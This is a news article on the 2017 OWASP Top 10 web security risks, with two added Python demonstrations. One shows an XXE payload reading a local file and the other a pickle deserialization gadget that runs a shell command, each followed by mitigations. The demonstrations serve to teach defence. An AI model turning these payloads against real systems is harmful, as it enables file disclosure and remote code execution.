Roughly every three years the Open Web Application Security Project (OWASP) has the unenviable task of compiling a list of the top 10 web application security risks. It is a guide to the issues web developers should be looking out for when coding, because these are the problems that most often lead to breaches.
The latest Top 10, released Tuesday, is distressingly familiar.
The task is unenviable because the list, first published in 2003, doesn’t get shorter. Regrettably, many of the same vulnerabilities appear edition after edition, not necessarily in the same order, because developers keep shipping the same careless mistakes.
Some familiar issues include injection, broken authentication, cross-site scripting (XSS) and — holy cow, still in 2017 — security misconfiguration.
“The rapid pace of modern software development processes makes the most common risks essential to discover and resolve quickly and accurately,” says the project in its foreword to this latest edition. “We can no longer afford to tolerate relatively simple security problems like those presented in this OWASP Top 10.”
“It’s amusing and sad at the same time to see XSS in the list,” commented Ilia Kolochenko, CEO of security vendor High-Tech Bridge, “a plague of web applications that has been around for almost 15 years now. XSS vulnerabilities are quite simple to prevent and detect, nonetheless many Web developers still carelessly push code riddled with XSSs into production.”
He did admit that XSS problems have become harder to detect because they often reside in parts of a Web application that automated crawlers can barely reach. Web technologies including HTML5, AJAX and single-page applications (SPAs) complicate Web application architecture and cannot be reliably audited with old-school vulnerability scanners and automated tools, he added. “Flawed application business logic is probably the most complicated issue, as to detect such flaws, one needs to understand internal business processes of a company, and even bug bounties will unlikely ever detect them.”
The 2017 list adds four new issues:
— #4: XML External Entities (XXE). Many older or poorly configured XML processors evaluate external entity references within XML documents. External entities can be used to disclose internal files using the file URI handler, reach internal file shares, scan internal ports, execute code remotely and mount denial of service attacks;
— #5: Broken Access Control (actually a merging of two entries from the 2013 list). Restrictions on what authenticated users are allowed to do are often not properly enforced. Attackers can exploit these flaws to access unauthorized functionality and/or data, such as other users’ accounts, sensitive files, the ability to modify other users’ data, change access rights, etc.;
— #8: Insecure Deserialization. This often leads to remote code execution. Even where deserialization flaws do not result in remote code execution, they can be used for replay attacks, injection attacks and privilege escalation;
— #10: Insufficient Logging and Monitoring. Coupled with missing or ineffective integration with incident response, this allows attackers to further attack systems, maintain persistence, pivot to more systems, and tamper with, extract or destroy data.
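To make the #4 entry concrete, here is an added example (not code from the article or from OWASP) of the classic XXE file disclosure using Python’s standard-library SAX parser. The attacker-controlled document, the secret file it reads and the `parse_note` helper are all constructed for this illustration; the parser feature name `feature_external_ges` is the real switch that decides whether external general entities are fetched. The same document is parsed twice, once with external entities enabled (the “older or poorly configured” processor) and once with them disabled.

```python
import io
import os
import tempfile
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges


class TextCollector(ContentHandler):
    """Collects the character data delivered for the document's elements."""

    def __init__(self):
        super().__init__()
        self.chunks = []

    def characters(self, content):
        self.chunks.append(content)


def build_xxe_document(target_path):
    # Constructed attacker input: the DTD declares an external general entity
    # whose SYSTEM identifier is a local file, and the body references it.
    return (
        '<?xml version="1.0"?>\n'
        "<!DOCTYPE note [\n"
        f'  <!ENTITY xxe SYSTEM "{target_path}">\n'
        "]>\n"
        "<note>&xxe;</note>\n"
    ).encode()


def parse_note(document, resolve_external_entities):
    """Parse an untrusted <note> document and return its text content.

    resolve_external_entities=True reproduces the vulnerable configuration;
    False is the hardened one (the default since Python 3.7.1).
    """
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, resolve_external_entities)
    handler = TextCollector()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(document))
    return "".join(handler.chunks)


def demo():
    """Returns (text with external entities on, text with them off)."""
    with tempfile.TemporaryDirectory() as workdir:
        # Constructed stand-in for a config file the attacker wants to read.
        secret_path = os.path.join(workdir, "secret.txt")
        with open(secret_path, "w") as fh:
            fh.write("db_password=hunter2")
        document = build_xxe_document(secret_path)
        leaked = parse_note(document, resolve_external_entities=True)
        blocked = parse_note(document, resolve_external_entities=False)
    return leaked, blocked


if __name__ == "__main__":
    leaked, blocked = demo()
    print("external entities enabled :", repr(leaked))
    print("external entities disabled:", repr(blocked))
```

With entities enabled the parser silently substitutes the contents of the secret file into the element text, which is exactly what a response that echoes the parsed value back to the client would then leak; with them disabled the reference expands to nothing. The same check applies to any XML library in use: find the option that controls DTD and external entity processing and make sure it is off for untrusted input.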
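The #8 entry is easiest to understand with a payload in hand. The following is an added example (not from the article or from OWASP) in Python, whose `pickle` module is a textbook insecure deserializer: a pickle stream can name any importable callable and the arguments to call it with. The gadget below calls the real `subprocess.check_output` with a harmless `echo`; a real payload would run whatever command the attacker chose. Beside it are two mitigations: a restricted unpickler that only reconstructs an allow-listed class, and the stronger fix of switching to a data-only format with explicit field validation. The `Session` class, the allow-list and the JSON layout are assumptions made for this illustration.

```python
import io
import json
import pickle
import subprocess
from dataclasses import dataclass


class Gadget:
    """Constructed attacker object. pickle serialises it as an instruction to
    call subprocess.check_output(argv) when the stream is loaded."""

    def __init__(self, argv):
        self.argv = argv

    def __reduce__(self):
        return (subprocess.check_output, (self.argv,))


def build_payload(argv):
    return pickle.dumps(Gadget(argv))


def unsafe_load(data):
    # The vulnerable pattern: untrusted bytes go straight into pickle.loads,
    # which imports and calls whatever global the stream names.
    return pickle.loads(data)


@dataclass
class Session:
    user_id: int
    role: str


def serialize_session(session):
    return pickle.dumps(session)


# Only the types the application legitimately stores may be reconstructed.
ALLOWED_GLOBALS = {(__name__, "Session")}


class RestrictedUnpickler(pickle.Unpickler):
    """Mitigation 1: refuse every global that is not explicitly allow-listed."""

    def find_class(self, module, name):
        if (module, name) in ALLOWED_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"global {module}.{name} is not allowed")


def safe_load(data):
    return RestrictedUnpickler(io.BytesIO(data)).load()


def try_safe_load(data):
    """Returns (True, obj) on success or (False, reason) if rejected."""
    try:
        return True, safe_load(data)
    except pickle.UnpicklingError as exc:
        return False, str(exc)


def session_from_json(text):
    """Mitigation 2 (preferred): a data-only format plus field validation,
    so the input can never name code to execute."""
    raw = json.loads(text)
    if not isinstance(raw, dict) or set(raw) != {"user_id", "role"}:
        raise ValueError("unexpected session fields")
    user_id, role = raw["user_id"], raw["role"]
    if isinstance(user_id, bool) or not isinstance(user_id, int):
        raise ValueError("user_id must be an integer")
    if role not in {"user", "admin"}:
        raise ValueError("unknown role")
    return Session(user_id, role)


if __name__ == "__main__":
    payload = build_payload(["echo", "pwned"])
    print("unsafe_load ran a command and returned:", unsafe_load(payload))
    print("safe_load on the same payload:", try_safe_load(payload))
    print("safe_load on a real session:", try_safe_load(serialize_session(Session(7, "user"))))
    print("json alternative:", session_from_json('{"user_id": 7, "role": "user"}'))
```

Note that the restricted unpickler is only as good as its allow-list: any allowed class with a dangerous `__setstate__` or `__reduce__` reopens the hole, which is why the OWASP guidance prefers not deserializing untrusted objects at all over trying to filter them.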
The list not only details the vulnerabilities and typical attack scenarios but also how CISOs and developers can prevent them from occurring.
Application security is no longer optional, the list’s authors warn organizations. “Between increasing attacks and regulatory pressures, organizations must establish effective processes and capabilities for securing their applications and APIs. Given the staggering amount of code in the numerous applications and APIs already in production, many organizations are struggling to get a handle on the enormous volume of vulnerabilities.
“OWASP recommends organizations establish an application security program to gain insight and improve security across their applications and APIs. Achieving application security requires many different parts of an organization to work together efficiently, including security and audit, software development, business, and executive management. Security should be visible and measurable, so that all the different players can see and understand the organization’s application security posture.”
The list was compiled from vulnerability data contributed by firms that specialize in application security and from an industry survey completed by over 500 individuals. A primary aim of the OWASP Top 10 is to educate developers, designers, architects, managers, and organizations about the consequences of the most common and most important web application security weaknesses.
The OWASP offers a wide range of papers with advice for developers and security testers here